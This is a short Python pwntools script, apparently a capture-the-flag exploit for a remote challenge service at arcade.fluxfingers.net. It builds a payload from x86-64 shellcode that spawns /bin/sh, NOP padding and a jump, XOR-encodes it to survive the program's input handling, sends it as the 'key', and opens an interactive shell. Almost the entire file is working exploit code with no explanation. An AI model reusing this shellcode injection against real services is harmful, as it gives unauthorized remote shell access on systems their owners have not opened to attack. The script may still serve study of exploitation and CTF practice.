from pwn import *
import sys
import time

def create_exploit_string(s):
  result_rev = ''
  es_rev = s[::-1]
  for i, c in enumerate(es_rev):
    if i == 0:
      result_rev += c
    else:
      result_rev += chr(ord(c)^ord(result_rev[i-1]))
  r = result_rev[::-1]
  return r

# Shellcode from http://shell-storm.org/shellcode/files/shellcode-806.php
SHELLCODE = '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
PAD_LENGTH = 0x27 - len(SHELLCODE)
PADDING = '\x90'*PAD_LENGTH
JUMP = '\xeb\xdd'
exploit_string = create_exploit_string(SHELLCODE + PADDING + JUMP)

HOST = 'arcade.fluxfingers.net'
PORT = 1807
p = remote(HOST, PORT)
p.sendline('bc')
p.clean()
p.sendline('3')
p.recvuntil('Enter the Key to win: ')
p.sendline(exploit_string)
p.interactive()
p.close()